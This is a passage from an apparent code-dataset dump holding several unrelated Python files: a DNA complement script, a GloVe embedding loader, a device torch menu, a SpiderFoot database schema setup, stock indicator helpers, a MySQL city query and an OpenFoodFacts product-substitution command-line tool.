\n\t\t\t\tnew_sites.write(line2)\n\t\t\telse: \n\t\t\t\tcomp = seqcomplement(line2, 'DNA')\n\t\t\t\tnew_sites.write(comp) \n\nbed.close()\nold_sites.close()\nnew_sites.close()\n\n","sub_path":"msa/msas_with_bad_scores/daca/sequence_complement.py","file_name":"sequence_complement.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"352438097","text":"from typing import List\nfrom keras_preprocessing import sequence\nfrom keras_preprocessing.text import Tokenizer\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import MinMaxScaler\nfrom DatasetsConsumers.AbstractDataset import AbstractDataset\nfrom rootfile import ROOTPATH\nfrom utility.utility import file_exists, load, save\nimport numpy as np\nimport tensorflow as tf\n\nGLOVE_DIR = ROOTPATH + \"data/GloveWordEmbeddings/\"\n\n\nclass GloVe:\n dimensionCount = 0\n glove_file = ''\n model = {}\n\n def __init__(self, dimension_count: int):\n self.dimensionCount = dimension_count\n self.glove_file = \"glove.6B.\" + str(dimension_count) + \"d.txt\"\n # self.glove_file = 'glove.840B.300d.txt'\n\n # Load model\n def 
load_glove_model(self):\n if len(self.model) is not 0:\n return\n print('Features / Weights matrix not found.')\n print(\"Loading Glove word embeddings\")\n num_lines = 0\n line_counter = 0\n with open(GLOVE_DIR + self.glove_file, 'r+', encoding=\"utf8\") as f:\n for _ in f:\n num_lines += 1\n with open(GLOVE_DIR + self.glove_file, 'r+', encoding=\"utf8\") as f:\n for line in f:\n line_counter += 1\n if line_counter % int(num_lines / 10) == 0:\n print(\"{:.2f}%\".format(line_counter / (int(num_lines / 100) * 100) * 100))\n split_line = line.split()\n word = split_line[0]\n\n if len(split_line) > self.dimensionCount + 1:\n continue\n embedding = np.asarray(split_line[1:], dtype='float32')\n self.model[word] = embedding\n print(\"Done.\", len(self.model), \" tokens loaded!\")\n\n def get_weights_matrix(self, emails: List[List[str]], dataset: AbstractDataset, dataset_mode):\n wm_file_name = dataset_mode + \"/\" + \"{}_weights_matrix_{}\".format(dataset.get_name(), self.dimensionCount)\n\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(emails)\n sequences = tokenizer.texts_to_sequences(emails)\n sequences_matrix = sequence.pad_sequences(sequences, maxlen=256)\n if file_exists(wm_file_name):\n return load(wm_file_name), sequences_matrix\n\n self.load_glove_model()\n vocab_size = len(tokenizer.word_index) + 1\n weights_matrix = np.zeros((vocab_size, self.dimensionCount))\n for word, i in tokenizer.word_index.items():\n embedding_vector = self.model.get(word)\n if embedding_vector is not None:\n weights_matrix[i] = embedding_vector\n weights_matrix = tf.convert_to_tensor(weights_matrix)\n save(weights_matrix, wm_file_name)\n return weights_matrix, sequences_matrix\n\n # Check if features exist\n def get_features(self, emails: np.array, dataset: AbstractDataset):\n print(\"Loading embedding features\")\n feature_file_name = dataset.mode + \"/\" + dataset.get_name() + '_features_' + str(self.dimensionCount)\n if file_exists(feature_file_name):\n return load(feature_file_name)\n self.load_glove_model()\n sum_vectors_array = self.sum_vectors(emails)\n features = preprocessing.scale(sum_vectors_array)\n save(features, feature_file_name)\n return features\n\n def sum_vectors(self, words_in_emails):\n all_vector_sum = []\n for i in range(len(words_in_emails)):\n words = words_in_emails[i]\n vector_sum = np.zeros(self.dimensionCount)\n for word in words:\n if word in self.model:\n word_vector = self.model[word]\n vector_sum += word_vector\n all_vector_sum.append(vector_sum)\n scaler = MinMaxScaler()\n scaler.fit(all_vector_sum)\n MinMaxScaler(copy=True, feature_range=(0, 1))\n normed_vectors = scaler.transform(all_vector_sum)\n return normed_vectors\n","sub_path":"src/Glove/glovemodel.py","file_name":"glovemodel.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"644153478","text":"class Torch:\n\tdef __init__(self, app):\n\t\tself.app=app\n\t\tself.ledstatus=0\n\t\tself.npstatus=0\n\n\tdef run(self):\n\t\tchange=True\n\t\tclose_app=False\n\t\ti=0\n\t\tj=0\n\t\tred=0\n\t\tgreen=0\n\t\tblue=0\n\t\tdatau_old=0\n\t\tdatad_old=0\n\t\tdatas_old=0\n\t\tdata={}\n\t\tcolor_picker = False\n\t\tsecond_column = False\n\t\tnext_app=False\n\t\twhile((not close_app) and self.app.isAlive()):\n\t\t\tif (change):\n\t\t\t\t\tchange=False\n\t\t\t\t\tself.app.newImg()\n\t\t\t\t\tif not color_picker:\n\t\t\t\t\t\tself.app.setText((45,0), \"TORCH \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,10),\"TOP \", 
255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,20),\"SIDE \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,30),\"MENU \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((1,10+i*10),\">\", 255,self.app.getFonts()[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.app.setText((10,0),\"RED \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((70,0),str(red), 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tself.app.setText((10,10),\"GREEN \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((70,10),str(green), 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tself.app.setText((10,20),\"BLUE \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((70,20),str(blue), 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tself.app.setText((10,30),\"SET \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,40),\"RESET \", 255,self.app.getFonts()[0])\n\t\t\t\t\t\tself.app.setText((10,50),\"BACK \", 255,self.app.getFonts()[0])\n\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tself.app.setText((60,j*10),\">\", 255,self.app.getFonts()[0])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.app.setText((1,j*10),\">\", 255,self.app.getFonts()[0])\n\n\t\t\t\t\tdata=self.app.sendImg_and_recvData()\n\t\t\telse:\n\t\t\t\tdata=self.app.recvData()\n\t\t\t\n\t\t\t#print(data)\t\n\t\t\tif (data['DOWN']!=datad_old):\n\t\t\t\tdatad_old=data['DOWN']\n\t\t\t\tif(datad_old):\n\t\t\t\t\tif color_picker:\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tif j==0:\n\t\t\t\t\t\t\t\tif red > 0:\n\t\t\t\t\t\t\t\t\tred -=1\n\t\t\t\t\t\t\tif j==1:\n\t\t\t\t\t\t\t\tif green > 0:\n\t\t\t\t\t\t\t\t\tgreen -= 1\n\t\t\t\t\t\t\tif j==2:\n\t\t\t\t\t\t\t\tif blue > 0:\n\t\t\t\t\t\t\t\t\tblue -= 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif j==5:\n\t\t\t\t\t\t\t\tj=0\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tj+=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(i==2):\n\t\t\t\t\t\t\ti=0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ti+=1\n\n\t\t\t\t\tchange=True\n\t\t\telif (data['UP']!=datau_old):\n\t\t\t\tdatau_old=data['UP']\n\t\t\t\tif(datau_old):\n\t\t\t\t\tif color_picker:\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tif j==0:\n\t\t\t\t\t\t\t\tif red < 255:\n\t\t\t\t\t\t\t\t\tred +=1\n\t\t\t\t\t\t\tif j==1:\n\t\t\t\t\t\t\t\tif green < 255:\n\t\t\t\t\t\t\t\t\tgreen += 1\n\t\t\t\t\t\t\tif j==2:\n\t\t\t\t\t\t\t\tif blue < 255:\n\t\t\t\t\t\t\t\t\tblue += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif j==0:\n\t\t\t\t\t\t\t\tj=5\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tj-=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(i==0):\n\t\t\t\t\t\t\ti=2\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ti-=1\n\n\t\t\t\t\tchange=True\n\t\t\telif(data['SELECT']!=datas_old):\n\t\t\t\tdatas_old=data['SELECT']\n\t\t\t\tif(datas_old):\n\t\t\t\t\tif color_picker:\n\t\t\t\t\t\tif second_column:\n\t\t\t\t\t\t\tsecond_column = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif j==3:\n\t\t\t\t\t\t\t\tself.app.setNeopixel([red,green,blue])\n\t\t\t\t\t\t\telif j==4:\n\t\t\t\t\t\t\t\tred = 0\n\t\t\t\t\t\t\t\tgreen = 0\n\t\t\t\t\t\t\t\tblue = 0\n\t\t\t\t\t\t\t\tself.app.setNeopixel([red,green,blue])\n\t\t\t\t\t\t\telif j==5:\n\t\t\t\t\t\t\t\tcolor_picker = False\n\t\t\t\t\t\t\t\tj=0\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tsecond_column = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tif(i==2):\n\t\t\t\t\t\t\tnext_app=True\n\t\t\t\t\t\telif(i==1):\n\t\t\t\t\t\t\tself.ledstatus=not self.ledstatus\n\t\t\t\t\t\t\tself.app.setOutPin(16, self.ledstatus)\n\t\t\t\t\t\telif(i==0):\n\t\t\t\t\t\t\t'''self.npstatus= not 
self.npstatus\n\t\t\t\t\t\t\tself.app.setNeopixel([255*self.npstatus,255*self.npstatus,255*self.npstatus])'''\n\t\t\t\t\t\t\tcolor_picker = True\n\n\t\t\t\t\tchange = True\n\n\t\t\t#self.app.setNeopixel([red,green,blue])\n\n\t\t\tif (next_app and data['SELECT']==0):\n\t\t\t\tnext_app=False\n\t\t\t\tclose_app = True\n\n\t\treturn -1\n\n\n","sub_path":"eulero/src/torch.py","file_name":"torch.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"271171356","text":"#-------------------------------------------------------------------------------\r\n# Name: sfdbsetup\r\n# Purpose: Create a new SpiderFoot database.\r\n#\r\n# Author: Steve Micallef \r\n#\r\n# Created: 15/02/2013\r\n# Copyright: (c) Steve Micallef 2013\r\n# Licence: GPL\r\n#-------------------------------------------------------------------------------\r\n\r\nimport sqlite3\r\nimport sys\r\n\r\nclass SpiderFootDbInit:\r\n def __init__(self, opts):\r\n\r\n # connect() will create the database file if it doesn't exist, but\r\n # at least we can use this opportunity to ensure we have permissions to\r\n # read and write to such a file.\r\n dbh = sqlite3.connect(opts['__database'], timeout=10)\r\n if dbh == None:\r\n sf.error(\"Could not initialize internal database. Check that \" + \\\r\n opts['__database'] + \" is readable and writable.\")\r\n dbh.text_factory = str\r\n self.conn = dbh\r\n self.dbh = dbh.cursor()\r\n return\r\n\r\n # Close the database handle\r\n def close(self):\r\n self.dbh.close()\r\n\r\n def create(self):\r\n queries = [\r\n \"PRAGMA journal_mode=WAL\",\r\n \"CREATE TABLE tbl_event_types ( \\\r\n event VARCHAR NOT NULL PRIMARY KEY, \\\r\n event_descr VARCHAR NOT NULL, \\\r\n event_raw INT NOT NULL DEFAULT 0 \\\r\n )\",\r\n \"CREATE TABLE tbl_config ( \\\r\n scope VARCHAR NOT NULL, \\\r\n opt VARCHAR NOT NULL, \\\r\n val VARCHAR NOT NULL, \\\r\n PRIMARY KEY (scope, opt) \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_instance ( \\\r\n guid VARCHAR NOT NULL PRIMARY KEY, \\\r\n name VARCHAR NOT NULL, \\\r\n seed_target VARCHAR NOT NULL, \\\r\n created INT DEFAULT 0, \\\r\n started INT DEFAULT 0, \\\r\n ended INT DEFAULT 0, \\\r\n status VARCHAR NOT NULL \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_log ( \\\r\n scan_instance_id VARCHAR NOT NULL REFERENCES tbl_scan_instance(guid), \\\r\n generated INT NOT NULL, \\\r\n component VARCHAR, \\\r\n type VARCHAR NOT NULL, \\\r\n message VARCHAR \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_config ( \\\r\n scan_instance_id VARCHAR NOT NULL REFERENCES tbl_scan_instance(guid), \\\r\n component VARCHAR NOT NULL, \\\r\n opt VARCHAR NOT NULL, \\\r\n val VARCHAR NOT NULL \\\r\n )\",\r\n \"CREATE TABLE tbl_scan_results ( \\\r\n scan_instance_id VARCHAR NOT NULL REFERENCES tbl_scan_instance(guid), \\\r\n hash VARCHAR NOT NULL, \\\r\n type VARCHAR NOT NULL REFERENCES tbl_event_types(event), \\\r\n generated INT NOT NULL, \\\r\n confidence INT NOT NULL DEFAULT 100, \\\r\n visibility INT NOT NULL DEFAULT 100, \\\r\n risk INT NOT NULL DEFAULT 0, \\\r\n module VARCHAR NOT NULL, \\\r\n data VARCHAR, \\\r\n source_event_hash VARCHAR DEFAULT 'ROOT' \\\r\n )\",\r\n \"CREATE INDEX idx_scan_results_id ON tbl_scan_results (scan_instance_id)\",\r\n \"CREATE INDEX idx_scan_results_type ON tbl_scan_results (scan_instance_id, type)\",\r\n \"CREATE INDEX idx_scan_results_hash ON tbl_scan_results (hash)\",\r\n \"CREATE INDEX idx_scan_logs ON tbl_scan_log (scan_instance_id)\",\r\n \"INSERT INTO tbl_event_types (event, 
event_descr, event_raw) VALUES ('AFFILIATE', 'Affiliate', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('EMAILADDR', 'Email Address', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('GEOINFO', 'Physical Location', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('HTTP_CODE', 'HTTP Status Code', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('INITIAL_TARGET', 'User-Supplied Target', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('IP_ADDRESS', 'IP Address', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('NETBLOCK', 'Netblock Ownership', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('LINKED_URL_INTERNAL', 'Linked URL - Internal', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('LINKED_URL_EXTERNAL', 'Linked URL - External', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('RAW_DATA', 'Raw Data', 1)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('SUBDOMAIN', 'Sub-domain', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('SIMILARDOMAIN', 'Similar Domain', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('TCP_PORT_OPEN', 'Open TCP Port', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_FORM', 'URL (Form)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_FLASH', 'URL (Uses Flash)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_JAVASCRIPT', 'URL (Uses Javascript)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_JAVA_APPLET', 'URL (Uses Java applet)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_STATIC', 'URL (Purely Static)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_PASSWORD', 'URL (Accepts Passwords)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('URL_UPLOAD', 'URL (Accepts Uploads)', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('WEBSERVER_BANNER', 'Web Server', 0)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('WEBSERVER_HTTPHEADERS', 'HTTP Headers', 1)\",\r\n \"INSERT INTO tbl_event_types (event, event_descr, event_raw) VALUES ('WEBSERVER_TECHNOLOGY', 'Web Technology', 0)\"\r\n ]\r\n\r\n try:\r\n for qry in queries:\r\n self.dbh.execute(qry)\r\n self.conn.commit()\r\n except sqlite3.Error as e:\r\n raise BaseException(\"SQL error encountered when setting up database: \" +\r\n e.args[0])\r\n\r\n","sub_path":"sfdbsetup.py","file_name":"sfdbsetup.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"5673466","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\nclass Input:\n\n def __init__(self, x: np.array, shape: tuple, nombre: str = \"Input_layer\"):\n \"\"\"EL\n shape: lista de shape debe ser ancho, alto y capas\"\"\"\n self.X = x\n self.shape = shape\n self.nombre = nombre\n self.capas = None\n self.index = 0\n assert x.shape == shape, f\"El shape de los datos {x.shape[1:]} es diferente del input indicado {shape}\"\n\n\n def __str__(self, ):\n return f\"Input: {self.nombre}, shape= 
{self.shape}, type: {type(self.X)}\"\n\n\nif __name__ == '__main__':\n volumen_random = np.random.random(9)\n df = np.array([volumen_random/(1+np.square(x)) for x in range(10)])\n entrada = Input(x=df, shape=(9,))\n print(entrada.__dict__)\n","sub_path":"Input.py","file_name":"Input.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"565943433","text":"import talib\nimport getting_data as gd\nimport numpy as np \nimport pandas as pd\n\n\n# Pandas dataframe settiongs\npd.set_option('display.float_format', lambda x: '%.5f' % x)\n# to reset that option: \n# pd.reset_option('display.float_format')\n# Set all values to five decimal places instead of scientific notation\n\n# Supressing SettingWithCopyWarning Message: REVISE LATER\npd.options.mode.chained_assignment = None # default='warn'\n\n\ndef ADX(df):\n data = df[[\"High\", \"Low\", \"Adj Close\"]]\n adx = talib.ADX(data[\"High\"], data[\"Low\"], data[\"Adj Close\"], timeperiod=14)\n df[\"ADX\"] = pd.Series(adx, index=df.index)\n\n return df\n\ndef MACD(df):\n data = df[\"Adj Close\"]\n macd, macdsignal, macdhist = talib.MACD(data, fastperiod=12, slowperiod=26, signalperiod=9)\n df[\"MACD\"] = pd.Series(macd, index=df.index)\n\n return df\n\n\ndef ATR(df):\n data = df[[\"High\", \"Low\", \"Adj Close\"]] \n atr = talib.ATR(data[\"High\"], data[\"Low\"], data[\"Adj Close\"], timeperiod=14)\n df[\"ATR\"] = pd.Series(atr, index=df.index)\n\n return df\n\nif __name__ == \"__main__\":\n ATR(df=gd.getData(\"TSLA\"))\n","sub_path":"Volume_technical_analysis.py","file_name":"Volume_technical_analysis.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"98309318","text":"#!/usr/bin/python3\n'''\n Lists all cities associated with given state\n'''\nimport MySQLdb\nfrom sys import argv\nif __name__ == \"__main__\":\n connection = MySQLdb.connect(host=\"localhost\", port=3306, charset=\"utf8\",\n user=argv[1], passwd=argv[2], db=argv[3])\n cursor = connection.cursor()\n selection = \"SELECT cities.name FROM cities \" +\\\n \"JOIN states ON cities.state_id = states.id \" +\\\n \"WHERE states.name = %s ORDER BY cities.id ASC\"\n cursor.execute(selection, (argv[4],))\n rows = cursor.fetchall()\n\n ret = \"\"\n flag = False\n for eachRow in rows:\n ret += ', ' if flag else ''\n flag = True\n ret += eachRow[0]\n print(ret)\n cursor.close()\n connection.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"317302775","text":"import json\nimport random\n\nimport mysql.connector\nimport requests\nfrom colorama import Back, Fore, init\n\nfrom config import configuration as conf\nfrom config.dbase import Dbase\nfrom purbeurre import header, home\n\ninit(autoreset=True)\n\n\ndef display_ls_categories():\n \"\"\"Displays the categories of the json file\n \"\"\"\n categories = conf.read_categories()[\"ls_categories\"]\n\n print(\"Liste des catégories disponibles :\")\n num = 0\n for category in categories:\n num += 1\n print(str(num).center(2, \" \"), \"-\", category)\n\n print(\"-\" * 80)\n category_input = input(\n \"Veuillez saisir un nombre entre 1 et {} ou 'q' pour quitter : \".format(len(categories)))\n\n if category_input.lower() == \"q\":\n print(\"\\nAu revoir et à 
bientôt\")\n exit()\n\n else:\n try:\n category_input = int(category_input)\n except:\n error = (\n \" Veuillez saisir un nombre entre 1 et {} ou 'q' pour quitter\".format(len(categories)))\n header(error)\n display_ls_categories()\n else:\n if category_input > 0 and category_input <= len(categories):\n category = categories[category_input-1]\n print(\"\\nVous avez choisi la catégorie :\", category)\n print(\"-\" * 80)\n header()\n display_ls_products(category)\n\n else:\n error = (\n \"Veuillez saisir un nombre entre 1 et {} ou 'q' pour quitter\".format(len(categories)))\n header(error)\n display_ls_categories()\n\n\ndef display_ls_products(category, page_number=1):\n \"\"\"Display the list of products\n\n Arguments:\n category {str} -- Category\n\n Keyword Arguments:\n page_number {int} -- Page number (default: {1})\n \"\"\"\n url = conf.url_categories(category, page_number)\n r = requests.get(url).json()\n products = json.dumps(r)\n page = json.loads(products)\n num_page = page['page']\n total_products = page[\"count\"]\n number_page = int(page[\"count\"]/20 + 1)\n print(\"Nb de '{}' trouvé(e)s = {} - Page = {} sur {}\".format(category,\n total_products, num_page, number_page))\n product_num = 1\n for x in page['products']:\n print(\"{:2d} - {}, {}\".format(product_num,\n x['product_name_fr'], x['quantity']))\n product_num += 1\n print(\"-\" * 80)\n if num_page > 1:\n print(\"
- Page précèdente\")\n else:\n print(\"-\")\n print(\" - Page suivante\")\n print(\" - Accueil\")\n print(\" - Quitter\")\n\n product_choice = input(\"\\nEntrez votre choix : \")\n\n if product_choice == \"p\":\n if num_page > 1:\n header()\n display_ls_products(category, page_number - 1)\n else:\n header()\n display_ls_products(category, page_number=1)\n\n elif product_choice == \"s\":\n header()\n display_ls_products(category, page_number + 1)\n\n elif product_choice == \"a\":\n header()\n home()\n\n elif product_choice == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n try:\n product_choice = int(product_choice)\n except:\n error = (\n \"Veuillez saisir un nombre entre 1 et {}, 'n', 'q'\".format(len(page['products'])))\n header(error)\n display_ls_products(category)\n else:\n if product_choice > 0 and product_choice <= len(page['products']):\n code = (page['products'][product_choice-1]['code'])\n header()\n display_product(code, category)\n display_alter_product(code, category)\n\n else:\n error = (\n \" Veuillez saisir un nombre entre 1 et {}, 'n', 'q'\".format(len(page['products'])))\n header(error)\n display_ls_products(category, page_number)\n\n\ndef display_product(code, category):\n \"\"\"Displays the 'product sheet'\n\n Arguments:\n code {str} -- Code product\n category {str} -- Category\n \"\"\"\n category = category\n url = conf.url_product(code)\n r = requests.get(url).json()\n page_product = json.dumps(r)\n\n product = json.loads(page_product)\n line_1 = \"Code produit ...........: \"\n line_2 = \"Nom du produit .........: \"\n line_3 = \"Quantité ...............: \"\n line_4 = \"Fabriquant .............: \"\n line_5 = \"Suggestion de magasin ..: \"\n line_6 = \"Nutri-score ............: \"\n line_7 = \"Page OpenFoodFacts .....: \"\n\n print(f\"{line_1}{product['code']}\")\n print(f\"{line_2}{product['product']['product_name_fr']}\")\n print(f\"{line_3}{product['product']['quantity']}\")\n print(f\"{line_4}{product['product']['brands']}\")\n print(f\"{line_5}{product['product']['stores']}\")\n\n if product['product']['nutrition_grades'] == \"a\":\n print(line_6 + Back.GREEN + Fore.BLACK + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"b\":\n print(line_6 + Back.GREEN + Fore.YELLOW + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"c\":\n print(line_6 + Back.YELLOW + Fore.BLACK + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"d\":\n print(line_6 + Back.YELLOW + Fore.RED + \" \" +\n product['product']['nutrition_grades'] + \" \")\n elif product['product']['nutrition_grades'] == \"e\":\n print(line_6 + Back.RED + Fore.BLACK + \" \" +\n product['product']['nutrition_grades'] + \" \")\n\n print(f\"{line_7}https://fr.openfoodfacts.org/produit/\\\n{product['product']['code']}\")\n\n\ndef display_alter_product(code, category):\n \"\"\"Search alternative product\n\n Arguments:\n code {str} -- Code product\n category {str} -- Category\n \"\"\"\n category = category\n url = conf.url_product(code)\n r = requests.get(url).json()\n page_product = json.dumps(r)\n product = json.loads(page_product)\n print(\"*\" * 80)\n # print(product['product']['generic_name_fr'])\n # print(len(product['product']['generic_name_fr']))\n\n if len(product['product']['generic_name_fr']) == 0:\n keyword = conf.cleaner(product['product']['product_name_fr'])\n print(\"Produit de subsitution pour :\", keyword)\n else:\n 
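# (a minimal alternative sketch, not part of the original file: the nutri-score
#  colour branches in display_product() above could collapse into one lookup,
#  reusing the colorama Back/Fore constants imported at the top of this script)
# NUTRI_STYLE = {"a": Back.GREEN + Fore.BLACK, "b": Back.GREEN + Fore.YELLOW,
#                "c": Back.YELLOW + Fore.BLACK, "d": Back.YELLOW + Fore.RED,
#                "e": Back.RED + Fore.BLACK}
# grade = product['product']['nutrition_grades']
# print(line_6 + NUTRI_STYLE.get(grade, "") + " " + grade + " ")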
keyword = conf.cleaner(product['product']['generic_name_fr'])\n print(\"Produit de sublistution pour :\", keyword)\n\n if product['product']['nutrition_grades'] != \"a\":\n url = conf.url_alt_product(keyword)\n r = requests.get(url).json()\n page_alter = json.dumps(r)\n alter = json.loads(page_alter)\n if alter[\"count\"] > 0:\n print(\"Nombre de produits trouvés en nutriscore 'a':\",\n alter[\"count\"])\n if alter[\"count\"] > 20:\n hazard = random.randint(0, 20)\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n hazard = random.randint(0, alter[\"count\"])\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n url = conf.url_alt_product(keyword, 'b')\n r = requests.get(url).json()\n page_alter = json.dumps(r)\n alter = json.loads(page_alter)\n if alter[\"count\"] > 0:\n print(\"Nombre de produits trouvés en nutriscore 'b':\",\n alter[\"count\"])\n if alter[\"count\"] > 20:\n hazard = random.randint(0, 20)\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n hazard = random.randint(0, alter[\"count\"])\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n url = conf.url_alt_product(keyword, 'c')\n r = requests.get(url).json()\n page_alter = json.dumps(r)\n alter = json.loads(page_alter)\n if alter[\"count\"] > 0:\n print(\"Nombre de produits trouvés en nutriscore 'c':\",\n alter[\"count\"])\n if alter[\"count\"] > 20:\n hazard = random.randint(0, 20)\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n hazard = random.randint(0, alter[\"count\"])\n # print(\"URL:\", alter[\"products\"][hazard][\"url\"])\n code = (alter[\"products\"][hazard-1][\"code\"])\n display_product(code, category)\n else:\n print(\"\\nOups ! 
Pas de produit de substition trouvé :-(\")\n\n else:\n print(\"\")\n\n print(\"-\" * 80)\n print(\" - Accueil\")\n print(\" - Retour\")\n print(\" - Enregistrer\")\n print(\" - Quitter\")\n\n alter_input = input(\"\\nEntrez votre choix : \")\n\n if alter_input.lower() == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n elif alter_input.lower() == \"e\":\n try:\n Dbase.insert_tbl_categories(code, category)\n except mysql.connector.Error as err:\n if err.errno == 1062:\n msg = (\"Produit déjà enregistré\")\n header(msg)\n display_ls_products(category)\n else:\n msg = (\"Produit enregistré\")\n header(msg)\n display_ls_products(category)\n\n elif alter_input.lower() == \"a\":\n header()\n home()\n\n elif alter_input.lower() == \"r\":\n header()\n display_ls_products(category)\n\n else:\n error = (\"Saisie incorrecte\")\n header(error)\n display_ls_products(category)\n\n\ndef display_all_records():\n \"\"\"Displays all records in the database\n \"\"\"\n print(\"Display all records\")\n cnx = Dbase.sql_connect()\n cur = cnx.cursor()\n cur.execute(\"USE purbeurre\")\n cur.execute(\"\"\"\n SELECT * FROM Records;\n \"\"\")\n number_line = 1\n for raw in cur:\n print(f\"{raw[0]} - {raw[2]} {raw[3]}\")\n number_line += 1\n\n print(\"\")\n print(\"-\" * 80)\n print(\" - Accueil\")\n print(\" - Quitter\")\n ask = input(\">> \")\n\n if ask.lower() == \"q\":\n print(\"\\nAu revoir et à bientôt\")\n exit()\n\n elif ask.lower() == \"a\":\n header()\n home()\n\n try:\n ask = int(ask)\n except:\n error = (\"Entrée incorrecte\")\n header(error)\n display_all_records()\n else:\n header()\n display_record(ask, raw[1], raw[8])\n\n\ndef display_record(ask, code, category):\n \"\"\"Displays a product registered in the database\n\n Arguments:\n ask {str} -- User response\n code {str} -- Code product\n category {str} -- Category\n \"\"\"\n cnx = Dbase.sql_connect()\n cur = cnx.cursor()\n cur.execute(\"USE purbeurre\")\n\n cur.execute(\"\"\"\n SELECT * FROM Records WHERE id={}\n \"\"\".format(ask))\n 